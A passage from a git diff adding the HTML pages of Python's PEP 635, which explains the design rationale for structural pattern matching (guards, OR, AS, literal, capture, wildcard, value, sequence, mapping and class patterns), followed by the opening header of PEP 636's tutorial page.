Since Python is a statement-oriented language in the tradition of Algol, and as +each composite statement starts with an identifying keyword, case seemed to +be most in line with Python’s style and traditions.

+
+

Match Semantics

+

The patterns of different case clauses might overlap in that more than +one case clause would match a given subject. The first-to-match rule +ensures that the selection of a case clause for a given subject is +unambiguous. Furthermore, case clauses can have increasingly general +patterns matching wider sets of subjects. The first-to-match rule +then ensures that the most precise pattern can be chosen (although it +is the programmer’s responsibility to order the case clauses correctly).

+

In a statically typed language, the match statement would be compiled to +a decision tree to select a matching pattern quickly and very efficiently. +This would, however, require that all patterns be purely declarative and +static, running against the established dynamic semantics of Python. The +proposed semantics thus represent a path incorporating the best of both +worlds: patterns are tried in a strictly sequential order so that each +case clause constitutes an actual statement. At the same time, we allow +the interpreter to cache any information about the subject or change the +order in which subpatterns are tried. In other words: if the interpreter +has found that the subject is not an instance of a class C, it can +directly skip case clauses testing for this again, without having to +perform repeated instance-checks. If a guard stipulates that a variable +x must be positive, say (i.e. if x > 0), the interpreter might +check this directly after binding x and before any further +subpatterns are considered.

+

Binding and scoping. In many pattern matching implementations, each +case clause would establish a separate scope of its own. Variables bound +by a pattern would then only be visible inside the corresponding case block. +In Python, however, this does not make sense. Establishing separate scopes +would essentially mean that each case clause is a separate function without +direct access to the variables in the surrounding scope (without having to +resort to nonlocal that is). Moreover, a case clause could no longer +influence any surrounding control flow through standard statement such as +return or break. Hence, such strict scoping would lead to +unintuitive and surprising behavior.

+

A direct consequence of this is that any variable bindings outlive the +respective case or match statements. Even patterns that only match a +subject partially might bind local variables (this is, in fact, necessary +for guards to function properly). However, these semantics for variable +binding are in line with existing Python structures such as for loops and +with statements.

+
+
+

Guards

+

Some constraints cannot be adequately expressed through patterns alone. +For instance, a ‘less’ or ‘greater than’ relationship defies the usual +‘equal’ semantics of patterns. Moreover, different subpatterns are +independent and cannot refer to each other. The addition of guards +addresses these restrictions: a guard is an arbitrary expression attached +to a pattern and that must evaluate to a “truthy” value for the pattern to succeed.

+

For example, case [x, y] if x < y: uses a guard (if x < y) to +express a ‘less than’ relationship between two otherwise disjoint capture +patterns x and y.

+

From a conceptual point of view, patterns describe structural constraints +on the subject in a declarative style, ideally without any side-effects. +Recall, in particular, that patterns are clearly distinct from expressions, +following different objectives and semantics. Guards then enhance case +blocks in a highly controlled way with arbitrary expressions (that might +have side effects). Splitting the overall functionality into a static structural +and a dynamically evaluated part not only helps with readability, but can +also introduce dramatic potential for compiler optimizations. To keep this +clear separation, guards are only supported on the level of case clauses +and not for individual patterns.

+

Example using guards:

+
def sort(seq):
+    match seq:
+        case [] | [_]:
+            return seq
+        case [x, y] if x <= y:
+            return seq
+        case [x, y]:
+            return [y, x]
+        case [x, y, z] if x <= y <= z:
+            return seq
+        case [x, y, z] if x >= y >= z:
+            return [z, y, x]
+        case [p, *rest]:
+            a = sort([x for x in rest if x <= p])
+            b = sort([x for x in rest if p < x])
+            return a + [p] + b
+
+
+
+
+
+

Patterns

+

Patterns fulfill two purposes: they impose (structural) constraints on +the subject and they specify which data values should be extracted from +the subject and bound to variables. In iterable unpacking, which can be +seen as a prototype to pattern matching in Python, there is only one +structural pattern to express sequences while there is a rich set of +binding patterns to assign a value to a specific variable or field. +Full pattern matching differs from this in that there is more variety +in structural patterns but only a minimum of binding patterns.

+

Patterns differ from assignment targets (as in iterable unpacking) in two ways: +they impose additional constraints on the structure of the subject, and +a subject may safely fail to match a specific pattern at any point +(in iterable unpacking, this constitutes an error). The latter means that +pattern should avoid side effects wherever possible.

+

This desire to avoid side effects is one reason why capture patterns +don’t allow binding values to attributes or subscripts: if the +containing pattern were to fail in a later step, it would be hard to +revert such bindings.

+

A cornerstone of pattern matching is the possibility of arbitrarily +nesting patterns. The nesting allows expressing deep +tree structures (for an example of nested class patterns, see the motivation +section above) as well as alternatives.

+

Although patterns might superficially look like expressions, +it is important to keep in mind that there is a clear distinction. In fact, +no pattern is or contains an expression. It is more productive to think of +patterns as declarative elements similar to the formal parameters in a +function definition.

+
+

AS Patterns

+

Patterns fall into two categories: most patterns impose a (structural) +constraint that the subject needs to fulfill, whereas the capture pattern +binds the subject to a name without regard for the subject’s structure or +actual value. Consequently, a pattern can either express a constraint or +bind a value, but not both. AS patterns fill this gap in that they +allow the user to specify a general pattern as well as capture the subject +in a variable.

+

Typical use cases for the AS pattern include OR and Class patterns +together with a binding name as in, e.g., case BinOp('+'|'-' as op, ...): +or case [int() as first, int() as second]:. The latter could be +understood as saying that the subject must fulfil two distinct pattern: +[first, second] as well as [int(), int()]. The AS pattern +can thus be seen as a special case of an ‘and’ pattern (see OR patterns +below for an additional discussion of ‘and’ patterns).

+

In an earlier version, the AS pattern was devised as a ‘Walrus pattern’, +written as case [first:=int(), second:=int()]. However, using as +offers some advantages over :=:

+
    +
  • The walrus operator := is used to capture the result of an expression +on the right hand side, whereas as generally indicates some form of +‘processing’ as in import foo as bar or except E as err:. Indeed, +the pattern P as x does not assign the pattern P to x, but +rather the subject that successfully matches P.
  • +
  • as allows for a more consistent data flow from left to right (the +attributes in Class patterns also follow a left-to-right data flow).
  • +
  • The walrus operator looks very similar to the syntax for matching attributes in the Class pattern, +potentially leading to some confusion.
  • +
+

Example using the AS pattern:

+
def simplify_expr(tokens):
+    match tokens:
+        case [('('|'[') as l, *expr, (')'|']') as r] if (l+r) in ('()', '[]'):
+            return simplify_expr(expr)
+        case [0, ('+'|'-') as op, right]:
+            return UnaryOp(op, right)
+        case [(int() | float() as left) | Num(left), '+', (int() | float() as right) | Num(right)]:
+            return Num(left + right)
+        case [(int() | float()) as value]:
+            return Num(value)
+
+
+
+
+

OR Patterns

+

The OR pattern allows you to combine ‘structurally equivalent’ alternatives +into a new pattern, i.e. several patterns can share a common handler. If any +of an OR pattern’s subpatterns matches the subject, the entire OR +pattern succeeds.

+

Statically typed languages prohibit the binding of names (capture patterns) +inside an OR pattern because of potential conflicts concerning the types of +variables. As a dynamically typed language, Python can be less restrictive +here and allow capture patterns inside OR patterns. However, each subpattern +must bind the same set of variables so as not to leave potentially undefined +names. With two alternatives P | Q, this means that if P binds the +variables u and v, Q must bind exactly the same variables u and v.

+

There was some discussion on whether to use the bar symbol | or the or +keyword to separate alternatives. The OR pattern does not fully fit +the existing semantics and usage of either of these two symbols. However, +| is the symbol of choice in all programming languages with support of +the OR pattern and is used in that capacity for regular expressions in +Python as well. It is also the traditional separator between alternatives +in formal grammars (including Python’s). +Moreover, | is not only used for bitwise OR, but also +for set unions and dict merging (PEP 584).

+

Other alternatives were considered as well, but none of these would allow +OR-patterns to be nested inside other patterns:

+
    +
  • Using a comma:
    case 401, 403, 404:
    +    print("Some HTTP error")
    +
    +
    +

    This looks too much like a tuple – we would have to find a different way +to spell tuples, and the construct would have to be parenthesized inside +the argument list of a class pattern. In general, commas already have many +different meanings in Python, we shouldn’t add more.

    +
  • +
  • Using stacked cases:
    case 401:
    +case 403:
    +case 404:
    +    print("Some HTTP error")
    +
    +
    +

    This is how this would be done in C, using its fall-through semantics +for cases. However, we don’t want to mislead people into thinking that +match/case uses fall-through semantics (which are a common source of bugs +in C). Also, this would be a novel indentation pattern, which might make +it harder to support in IDEs and such (it would break the simple rule “add +an indentation level after a line ending in a colon”). Finally, this +would not support OR patterns nested inside other patterns, either.

    +
  • +
  • Using “case in” followed by a comma-separated list:
    case in 401, 403, 404:
    +    print("Some HTTP error")
    +
    +
    +

    This would not work for OR patterns nested inside other patterns, like:

    +
    case Point(0|1, 0|1):
    +    print("A corner of the unit square")
    +
    +
    +
  • +
+

AND and NOT Patterns

+

Since this proposal defines an OR-pattern (|) to match one of several alternates, +why not also an AND-pattern (&) or even a NOT-pattern (!)? +Especially given that some other languages (F# for example) support +AND-patterns.

+

However, it is not clear how useful this would be. The semantics for matching +dictionaries, objects and sequences already incorporates an implicit ‘and’: +all attributes and elements mentioned must be present for the match to +succeed. Guard conditions can also support many of the use cases that a +hypothetical ‘and’ operator would be used for.

+

A negation of a match pattern using the operator ! as a prefix +would match exactly if the pattern itself does not match. For +instance, !(3 | 4) would match anything except 3 or 4. +However, there is evidence from other languages that this is +rarely useful, and primarily used as double negation !! to control +variable scopes and prevent variable bindings (which does not apply to +Python). Other use cases are better expressed using guards.

+

In the end, it was decided that this would make the syntax more complex +without adding a significant benefit. It can always be added later.

+

Example using the OR pattern:

+
def simplify(expr):
+    match expr:
+        case ('/', 0, 0):
+            return expr
+        case ('*'|'/', 0, _):
+            return 0
+        case ('+'|'-', x, 0) | ('+', 0, x) | ('*', 1, x) | ('*'|'/', x, 1):
+            return x
+    return expr
+
+
+
+
+

Literal Patterns

+

Literal patterns are a convenient way for imposing constraints on the +value of a subject, rather than its type or structure. They also +allow you to emulate a switch statement using pattern matching.

+

Generally, the subject is compared to a literal pattern by means of standard +equality (x == y in Python syntax). Consequently, the literal patterns +1.0 and 1 match exactly the same set of objects, i.e. case 1.0: +and case 1: are fully interchangeable. In principle, True would also +match the same set of objects because True == 1 holds. However, we +believe that many users would be surprised finding that case True: +matched the subject 1.0, resulting in some subtle bugs and convoluted +workarounds. We therefore adopted the rule that the three singleton +patterns None, False and True match by identity (x is y in +Python syntax) rather than equality. Hence, case True: will match only +True and nothing else. Note that case 1: would still match True, +though, because the literal pattern 1 works by equality and not identity.

+

Early ideas to induce a hierarchy on numbers so that case 1.0 would +match both the integer 1 and the floating point number 1.0, whereas +case 1: would only match the integer 1 were eventually dropped in +favor of the simpler and more consistent rule based on equality. Moreover, any +additional checks whether the subject is an instance of numbers.Integral +would come at a high runtime cost to introduce what would essentially be +a novel idea in Python. When needed, the explicit syntax case int(1): can +be used.

+

Recall that literal patterns are not expressions, but directly +denote a specific value. From a pragmatic point of view, we want to +allow using negative and even complex values as literal patterns, but +they are not atomic literals (only unsigned real and imaginary numbers +are). E.g., -3+4j is syntactically an expression of the form +BinOp(UnaryOp('-', 3), '+', 4j). Since expressions are not part +of patterns, we had to add explicit syntactic support for such values +without having to resort to full expressions.

+

Interpolated f-strings, on the +other hand, are not literal values, despite their appearance and can +therefore not be used as literal patterns (string concatenation, however, +is supported).

+

Literal patterns not only occur as patterns in their own right, but also +as keys in mapping patterns.

+

Range matching patterns. +This would allow patterns such as 1...6. However, there are a host of +ambiguities:

+
    +
  • Is the range open, half-open, or closed? (I.e. is 6 included in the +above example or not?)
  • +
  • Does the range match a single number, or a range object?
  • +
  • Range matching is often used for character ranges (‘a’…’z’) but that +won’t work in Python since there’s no character data type, just strings.
  • +
  • Range matching can be a significant performance optimization if you can +pre-build a jump table, but that’s not generally possible in Python due +to the fact that names can be dynamically rebound.
  • +
+

Rather than creating a special-case syntax for ranges, it was decided +that allowing custom pattern objects (InRange(0, 6)) would be more flexible +and less ambiguous; however those ideas have been postponed for the time +being.

+

Example using Literal patterns:

+
def simplify(expr):
+    match expr:
+        case ('+', 0, x):
+            return x
+        case ('+' | '-', x, 0):
+            return x
+        case ('and', True, x):
+            return x
+        case ('and', False, x):
+            return False
+        case ('or', False, x):
+            return x
+        case ('or', True, x):
+            return True
+        case ('not', ('not', x)):
+            return x
+    return expr
+
+
+
+
+

Capture Patterns

+

Capture patterns take on the form of a name that accepts any value and binds +it to a (local) variable (unless the name is declared as nonlocal or +global). In that sense, a capture pattern is similar +to a parameter in a function definition (when the function is called, each +parameter binds the respective argument to a local variable in the function’s +scope).

+

A name used for a capture pattern must not coincide with another capture +pattern in the same pattern. This, again, is similar to parameters, which +equally require each parameter name to be unique within the list of +parameters. It differs, however, from iterable unpacking assignment, where +the repeated use of a variable name as target is permissible (e.g., +x, x = 1, 2). The rationale for not supporting (x, x) in patterns +is its ambiguous reading: it could be seen as in iterable unpacking where +only the second binding to x survives. But it could be equally seen as +expressing a tuple with two equal elements (which comes with its own issues). +Should the need arise, then it is still possible to introduce support for +repeated use of names later on.

+

There were calls to explicitly mark capture patterns and thus identify them +as binding targets. According to that idea, a capture pattern would be +written as, e.g. ?x, $x or =x. The aim of such explicit capture +markers is to let an unmarked name be a value pattern (see below). +However, this is based on the misconception that pattern matching was an +extension of switch statements, placing the emphasis on fast switching based +on (ordinal) values. Such a switch statement has indeed been proposed for +Python before (see PEP 275 and PEP 3103). Pattern matching, on the other +hand, builds a generalized concept of iterable unpacking. Binding values +extracted from a data structure is at the very core of the concept and hence +the most common use case. Explicit markers for capture patterns would thus +betray the objective of the proposed pattern matching syntax and simplify +a secondary use case at the expense of additional syntactic clutter for +core cases.

+

It has been proposed that capture patterns are not needed at all, +since the equivalent effect can be obtained by combining an AS +pattern with a wildcard pattern (e.g., case _ as x is equivalent +to case x). However, this would be unpleasantly verbose, +especially given that we expect capture patterns to be very common.

+

Example using Capture patterns:

+
def average(*args):
+    match args:
+        case [x, y]:           # captures the two elements of a sequence
+            return (x + y) / 2
+        case [x]:              # captures the only element of a sequence
+            return x
+        case []:
+            return 0
+        case a:                # captures the entire sequence
+            return sum(a) / len(a)
+
+
+
+
+

Wildcard Pattern

+

The wildcard pattern is a special case of a ‘capture’ pattern: it accepts +any value, but does not bind it to a variable. The idea behind this rule +is to support repeated use of the wildcard in patterns. While (x, x) +is an error, (_, _) is legal.

+

Particularly in larger (sequence) patterns, it is important to allow the +pattern to concentrate on values with actual significance while ignoring +anything else. Without a wildcard, it would become necessary to ‘invent’ +a number of local variables, which would be bound but never used. Even +when sticking to naming conventions and using e.g. _1, _2, _3 to name +irrelevant values, say, this still introduces visual clutter and can hurt +performance (compare the sequence pattern (x, y, *z) to (_, y, *_), +where the *z forces the interpreter to copy a potentially very long +sequence, whereas the second version simply compiles to code along the +lines of y = seq[1]).

+

There has been much discussion about the choice of the underscore as _ +as a wildcard pattern, i.e. making this one name non-binding. However, the +underscore is already heavily used as an ‘ignore value’ marker in iterable +unpacking. Since the wildcard pattern _ never binds, this use of the +underscore does not interfere with other uses such as inside the REPL or +the gettext module.

+

It has been proposed to use ... (i.e., the ellipsis token) or * +(star) as a wildcard. However, both these look as if an arbitrary number +of items is omitted:

+
case [a, ..., z]: ...
+case [a, *, z]: ...
+
+
+

Either example looks like it would match a sequence of two or more +items, capturing the first and last values. While that may be the +ultimate “wildcard”, it does not convey the desired semantics.

+

An alternative that does not suggest an arbitrary number of items +would be ?. This is even being proposed independently from +pattern matching in PEP 640. We feel however that using ? as a +special “assignment” target is likely more confusing to Python users +than using _. It violates Python’s (admittedly vague) principle +of using punctuation characters only in ways similar to how they are +used in common English usage or in high school math, unless the usage +is very well established in other programming languages (like, e.g., +using a dot for member access).

+

The question mark fails on both counts: its use in other programming +languages is a grab-bag of usages only vaguely suggested by the idea +of a “question”. For example, it means “any character” in shell +globbing, “maybe” in regular expressions, “conditional expression” in +C and many C-derived languages, “predicate function” in Scheme, +“modify error handling” in Rust, “optional argument” and “optional +chaining” in TypeScript (the latter meaning has also been proposed for +Python by PEP 505). An as yet unnamed PEP proposes it to mark +optional types, e.g. int?.

+

Another common use of ? in programming systems is “help”, for +example, in IPython and Jupyter Notebooks and many interactive +command-line utilities.

+

In addition, this would put Python in a rather unique position: +The underscore is as a wildcard pattern in every +programming language with pattern matching that we could find +(including C#, Elixir, Erlang, F#, Grace, Haskell, +Mathematica, OCaml, Ruby, Rust, Scala, Swift, and Thorn). +Keeping in mind that many users of Python also work with other programming +languages, have prior experience when learning Python, and may move on to +other languages after having learned Python, we find that such +well-established standards are important and relevant with respect to +readability and learnability. In our view, concerns that this wildcard +means that a regular name received special treatment are not strong +enough to introduce syntax that would make Python special.

+

Else blocks. A case block without a guard whose pattern is a single +wildcard (i.e., case _:) accepts any subject without binding it to +a variable or performing any other operation. It is thus semantically +equivalent to else:, if it were supported. However, adding such +an else block to the match statement syntax would not remove the need +for the wildcard pattern in other contexts. Another argument against +this is that there would be two plausible indentation levels for an +else block: aligned with case or aligned with match. The +authors have found it quite contentious which indentation level to +prefer.

+

Example using the Wildcard pattern:

+
def is_closed(sequence):
+    match sequence:
+        case [_]:               # any sequence with a single element
+            return True
+        case [start, *_, end]:  # a sequence with at least two elements
+            return start == end
+        case _:                 # anything
+            return False
+
+
+
+
+

Value Patterns

+

It is good programming style to use named constants for parametric values or +to clarify the meaning of particular values. Clearly, it would be preferable +to write case (HttpStatus.OK, body): over +case (200, body):, for example. The main issue that arises here is how to +distinguish capture patterns (variable bindings) from value patterns. The +general discussion surrounding this issue has brought forward a plethora of +options, which we cannot all fully list here.

+

Strictly speaking, value patterns are not really necessary, but +could be implemented using guards, i.e. +case (status, body) if status == HttpStatus.OK:. Nonetheless, the +convenience of value patterns is unquestioned and obvious.

+

The observation that constants tend to be written in uppercase letters or +collected in enumeration-like namespaces suggests possible rules to discern +constants syntactically. However, the idea of using upper- vs. lowercase as +a marker has been met with scepticism since there is no similar precedence +in core Python (although it is common in other languages). We therefore only +adopted the rule that any dotted name (i.e., attribute access) is to be +interpreted as a value pattern, for example HttpStatus.OK +above. This precludes, in particular, local variables and global +variables defined in the current module from acting as constants.

+

A proposed rule to use a leading dot (e.g. +.CONSTANT) for that purpose was criticised because it was felt that the +dot would not be a visible-enough marker for that purpose. Partly inspired +by forms found in other programming languages, a number of different +markers/sigils were proposed (such as ^CONSTANT, $CONSTANT, +==CONSTANT, CONSTANT?, or the word enclosed in backticks), although +there was no obvious or natural choice. The current proposal therefore +leaves the discussion and possible introduction of such a ‘constant’ marker +for a future PEP.

+

Distinguishing the semantics of names based on whether it is a global +variable (i.e. the compiler would treat global variables as constants rather +than capture patterns) leads to various issues. The addition or alteration +of a global variable in the module could have unintended side effects on +patterns. Moreover, pattern matching could not be used directly inside a +module’s scope because all variables would be global, making capture +patterns impossible.

+

Example using the Value pattern:

+
def handle_reply(reply):
+    match reply:
+        case (HttpStatus.OK, MimeType.TEXT, body):
+            process_text(body)
+        case (HttpStatus.OK, MimeType.APPL_ZIP, body):
+            text = deflate(body)
+            process_text(text)
+        case (HttpStatus.MOVED_PERMANENTLY, new_URI):
+            resend_request(new_URI)
+        case (HttpStatus.NOT_FOUND):
+            raise ResourceNotFound()
+
+
+
+
+

Group Patterns

+

Allowing users to explicitly specify the grouping is particularly helpful +in case of OR patterns.

+
+
+

Sequence Patterns

+

Sequence patterns follow as closely as possible the already established +syntax and semantics of iterable unpacking. Of course, subpatterns take +the place of assignment targets (variables, attributes and subscript). +Moreover, the sequence pattern only matches a carefully selected set of +possible subjects, whereas iterable unpacking can be applied to any +iterable.

+
    +
  • As in iterable unpacking, we do not distinguish between ‘tuple’ and +‘list’ notation. [a, b, c], (a, b, c) and a, b, c are all +equivalent. While this means we have a redundant notation and checking +specifically for lists or tuples requires more effort (e.g. +case list([a, b, c])), we mimic iterable unpacking as much as +possible.
  • +
  • A starred pattern will capture a sub-sequence of arbitrary length, +again mirroring iterable unpacking. Only one starred item may be +present in any sequence pattern. In theory, patterns such as (*_, 3, *_) +could be understood as expressing any sequence containing the value 3. +In practice, however, this would only work for a very narrow set of use +cases and lead to inefficient backtracking or even ambiguities otherwise.
  • +
  • The sequence pattern does not iterate through an iterable subject. All +elements are accessed through subscripting and slicing, and the subject must +be an instance of collections.abc.Sequence. This includes, of course, +lists and tuples, but excludes e.g. sets and dictionaries. While it would +include strings and bytes, we make an exception for these (see below).
  • +
+

A sequence pattern cannot just iterate through any iterable object. The +consumption of elements from the iteration would have to be undone if the +overall pattern fails, which is not feasible.

+

To identify sequences we cannot rely on len() and subscripting and +slicing alone, because sequences share these protocols with mappings +(e.g. dict) in this regard. It would be surprising if a sequence +pattern also matched a dictionaries or other objects implementing +the mapping protocol (i.e. __getitem__). The interpreter therefore +performs an instance check to ensure that the subject in question really +is a sequence (of known type). (As an optimization of the most common +case, if the subject is exactly a list or a tuple, the instance check +can be skipped.)

+

String and bytes objects have a dual nature: they are both ‘atomic’ objects +in their own right, as well as sequences (with a strongly recursive nature +in that a string is a sequence of strings). The typical behavior and use +cases for strings and bytes are different enough from those of tuples and +lists to warrant a clear distinction. It is in fact often unintuitive and +unintended that strings pass for sequences, as evidenced by regular questions +and complaints. Strings and bytes are therefore not matched by a sequence +pattern, limiting the sequence pattern to a very specific understanding of +‘sequence’. The built-in bytearray type, being a mutable version of +bytes, also deserves an exception; but we don’t intend to +enumerate all other types that may be used to represent bytes +(e.g. some, but not all, instances of memoryview and array.array).

+
+
+

Mapping Patterns

+

Dictionaries or mappings in general are one of the most important and most +widely used data structures in Python. In contrast to sequences, mappings +are built for fast direct access to arbitrary elements identified by a key. +In most cases an element is retrieved from a dictionary by a known key +without regard for any ordering or other key-value pairs stored in the same +dictionary. Particularly common are string keys.

+

The mapping pattern reflects the common usage of dictionary lookup: it allows +the user to extract some values from a mapping by means of constant/known +keys and have the values match given subpatterns. +Extra keys in the subject are ignored even if **rest is not present. +This is different from sequence patterns, where extra items will cause a +match to fail. But mappings are actually different from sequences: they +have natural structural sub-typing behavior, i.e., passing a dictionary +with extra keys somewhere will likely just work. +Should it be +necessary to impose an upper bound on the mapping and ensure that no +additional keys are present, then the usual double-star-pattern **rest +can be used. The special case **_ with a wildcard, however, is not +supported as it would not have any effect, but might lead to an incorrect +understanding of the mapping pattern’s semantics.

+

To avoid overly expensive matching algorithms, keys must be literals or +value patterns.

+

There is a subtle reason for using get(key, default) instead of +__getitem__(key) followed by a check for AttributeError: if +the subject happens to be a defaultdict, calling __getitem__ +for a non-existent key would add the key. Using get() avoids this +unexpected side effect.

+

Example using the Mapping pattern:

+
def change_red_to_blue(json_obj):
+    match json_obj:
+        case { 'color': ('red' | '#FF0000') }:
+            json_obj['color'] = 'blue'
+        case { 'children': children }:
+            for child in children:
+                change_red_to_blue(child)
+
+
+
+
+

Class Patterns

+

Class patterns fulfill two purposes: checking whether a given subject is +indeed an instance of a specific class, and extracting data from specific +attributes of the subject. Anecdotal evidence revealed that isinstance() +is one of the most often used functions in Python in terms of +static occurrences in programs. Such instance checks typically precede +a subsequent access to information stored in the object, or a possible +manipulation thereof. A typical pattern might be along the lines of:

+
def traverse_tree(node):
+    if isinstance(node, Node):
+        traverse_tree(node.left)
+        traverse_tree(node.right)
+    elif isinstance(node, Leaf):
+        print(node.value)
+
+
+

In many cases class patterns occur nested, as in the example +given in the motivation:

+
if (isinstance(node, BinOp) and node.op == "+"
+        and isinstance(node.right, BinOp) and node.right.op == "*"):
+    a, b, c = node.left, node.right.left, node.right.right
+    # Handle a + b*c
+
+
+

The class pattern lets you concisely specify both an instance check +and relevant attributes (with possible further constraints). It is +thereby very tempting to write, e.g., case Node(left, right): in the +first case above and case Leaf(value): in the second. While this +indeed works well for languages with strict algebraic data types, it is +problematic with the structure of Python objects.

+

When dealing with general Python objects, we face a potentially very large +number of unordered attributes: an instance of Node contains a large +number of attributes (most of which are ‘special methods’ such as +__repr__). Moreover, the interpreter cannot reliably deduce the +ordering of attributes. For an object that +represents a circle, say, there is no inherently obvious ordering of the +attributes x, y and radius.

+

We envision two possibilities for dealing with this issue: either explicitly +name the attributes of interest, or provide an additional mapping that tells +the interpreter which attributes to extract and in which order. Both +approaches are supported. Moreover, explicitly naming the attributes of +interest lets you further specify the required structure of an object; if +an object lacks an attribute specified by the pattern, the match fails.

+
    +
  • Attributes that are explicitly named pick up the syntax of named arguments. +If an object of class Node has two attributes left and right +as above, the pattern Node(left=x, right=y) will extract the values of +both attributes and assign them to x and y, respectively. The data +flow from left to right seems unusual, but is in line with mapping patterns +and has precedents such as assignments via as in with- or +import-statements (and indeed AS patterns).

    Naming the attributes in question explicitly will be mostly used for more +complex cases where the positional form (below) is insufficient.

    +
  • +
  • The class field __match_args__ specifies a number of attributes +together with their ordering, allowing class patterns to rely on positional +sub-patterns without having to explicitly name the attributes in question. +This is particularly handy for smaller objects or instances of data classes, +where the attributes of interest are rather obvious and often have a +well-defined ordering. In a way, __match_args__ is similar to the +declaration of formal parameters, which allows calling functions with +positional arguments rather than naming all the parameters.

    This is a class attribute, because it needs to be looked up on the class +named in the class pattern, not on the subject instance.

    +
  • +
+

The syntax of class patterns is based on the idea that de-construction +mirrors the syntax of construction. This is already the case in virtually +any Python construct, be assignment targets, function definitions or +iterable unpacking. In all these cases, we find that the syntax for +sending and that for receiving ‘data’ are virtually identical.

+
    +
  • Assignment targets such as variables, attributes and subscripts: +foo.bar[2] = foo.bar[3];
  • +
  • Function definitions: a function defined with def foo(x, y, z=6) +is called as, e.g., foo(123, y=45), where the actual arguments +provided at the call site are matched against the formal parameters +at the definition site;
  • +
  • Iterable unpacking: a, b = b, a or [a, b] = [b, a] or +(a, b) = (b, a), just to name a few equivalent possibilities.
  • +
+

Using the same syntax for reading and writing, l- and r-values, or +construction and de-construction is widely accepted for its benefits in +thinking about data, its flow and manipulation. This equally extends to +the explicit construction of instances, where class patterns C(p, q) +deliberately mirror the syntax of creating instances.

+

The special case for the built-in classes bool, bytearray +etc. (where e.g. str(x) captures the subject value in x) can +be emulated by a user-defined class as follows:

+
class MyClass:
+    __match_args__ = ["__myself__"]
+    __myself__ = property(lambda self: self)
+
+
+

Type annotations for pattern variables. +The proposal was to combine patterns with type annotations:

+
match x:
+    case [a: int, b: str]: print(f"An int {a} and a string {b}:")
+    case [a: int, b: int, c: int]: print("Three ints", a, b, c)
+    ...
+
+
+

This idea has a lot of problems. For one, the colon can only +be used inside of brackets or parentheses, otherwise the syntax becomes +ambiguous. And because Python disallows isinstance() checks +on generic types, type annotations containing generics will not +work as expected.

+
+
+
+
+

History and Context

+

Pattern matching emerged in the late 1970s in the form of tuple unpacking +and as a means to handle recursive data structures such as linked lists or +trees (object-oriented languages usually use the visitor pattern for handling +recursive data structures). The early proponents of pattern matching +organised structured data in ‘tagged tuples’ rather than struct as in +C or the objects introduced later. A node in a binary tree would, for +instance, be a tuple with two elements for the left and right branches, +respectively, and a Node tag, written as Node(left, right). In +Python we would probably put the tag inside the tuple as +('Node', left, right) or define a data class Node to achieve the +same effect.

+

Using modern syntax, a depth-first tree traversal would then be written as +follows:

+
def traverse(node):
+    match node:
+        case Node(left, right):
+            traverse(left)
+            traverse(right)
+        case Leaf(value):
+            handle(value)
+
+
+

The notion of handling recursive data structures with pattern matching +immediately gave rise to the idea of handling more general recursive +‘patterns’ (i.e. recursion beyond recursive data structures) +with pattern matching. Pattern matching would thus also be used to define +recursive functions such as:

+
def fib(arg):
+    match arg:
+        case 0:
+            return 1
+        case 1:
+            return 1
+        case n:
+            return fib(n-1) + fib(n-2)
+
+
+

As pattern matching was repeatedly integrated into new and emerging +programming languages, its syntax slightly evolved and expanded. The two +first cases in the fib example above could be written more succinctly +as case 0 | 1: with | denoting alternative patterns. Moreover, the +underscore _ was widely adopted as a wildcard, a filler where neither +the structure nor value of parts of a pattern were of substance. Since the +underscore is already frequently used in equivalent capacity in Python’s +iterable unpacking (e.g., _, _, third, _* = something) we kept these +universal standards.

+

It is noteworthy that the concept of pattern matching has always been +closely linked to the concept of functions. The different case clauses +have always been considered as something like semi-independent functions +where pattern variables take on the role of parameters. This becomes +most apparent when pattern matching is written as an overloaded function, +along the lines of (Standard ML):

+
fun fib 0 = 1
+  | fib 1 = 1
+  | fib n = fib (n-1) + fib (n-2)
+
+
+

Even though such a strict separation of case clauses into independent +functions does not apply in Python, we find that patterns share many +syntactic rules with parameters, such as binding arguments to unqualified +names only or that variable/parameter names must not be repeated for +a particular pattern/function.

+

With its emphasis on abstraction and encapsulation, object-oriented +programming posed a serious challenge to pattern matching. In short: in +object-oriented programming, we can no longer view objects as tagged tuples. +The arguments passed into the constructor do not necessarily specify the +attributes or fields of the objects. Moreover, there is no longer a strict +ordering of an object’s fields and some of the fields might be private and +thus inaccessible. And on top of this, the given object might actually be +an instance of a subclass with slightly different structure.

+

To address this challenge, patterns became increasingly independent of the +original tuple constructors. In a pattern like Node(left, right), +Node is no longer a passive tag, but rather a function that can actively +check for any given object whether it has the right structure and extract a +left and right field. In other words: the Node-tag becomes a +function that transforms an object into a tuple or returns some failure +indicator if it is not possible.

+

In Python, we simply use isinstance() together with the __match_args__ +field of a class to check whether an object has the correct structure and +then transform some of its attributes into a tuple. For the Node example +above, for instance, we would have __match_args__ = ('left', 'right') to +indicate that these two attributes should be extracted to form the tuple. +That is, case Node(x, y) would first check whether a given object is an +instance of Node and then assign left to x and right to y, +respectively.

+

Paying tribute to Python’s dynamic nature with ‘duck typing’, however, we +also added a more direct way to specify the presence of, or constraints on +specific attributes. Instead of Node(x, y) you could also write +object(left=x, right=y), effectively eliminating the isinstance() +check and thus supporting any object with left and right attributes. +Or you would combine these ideas to write Node(right=y) so as to require +an instance of Node but only extract the value of the right attribute.

+
+
+

Backwards Compatibility

+

Through its use of “soft keywords” and the new PEG parser (PEP 617), +the proposal remains fully backwards compatible. However, 3rd party +tooling that uses a LL(1) parser to parse Python source code may be +forced to switch parser technology to be able to support those same +features.

+
+
+

Security Implications

+

We do not expect any security implications from this language feature.

+
+
+

Reference Implementation

+

A feature-complete CPython implementation is available on +GitHub.

+

An interactive playground +based on the above implementation was created using Binder [2] and Jupyter [3].

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0635.rst

+

Last modified: 2024-07-24 22:56:04 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0636/index.html b/pep-0636/index.html new file mode 100644 index 00000000000..d8f2383b808 --- /dev/null +++ b/pep-0636/index.html @@ -0,0 +1,727 @@ + + + + + + + + PEP 636 – Structural Pattern Matching: Tutorial | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 636 – Structural Pattern Matching: Tutorial

+
+
Author:
+
Daniel F Moisset <dfmoisset at gmail.com>
+
Sponsor:
+
Guido van Rossum <guido at python.org>
+
BDFL-Delegate:
+

+
Discussions-To:
+
